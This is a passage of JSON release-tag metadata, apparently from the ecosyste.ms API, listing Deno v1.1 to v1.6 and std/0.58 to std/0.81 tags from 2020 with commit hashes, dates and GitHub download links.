tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ec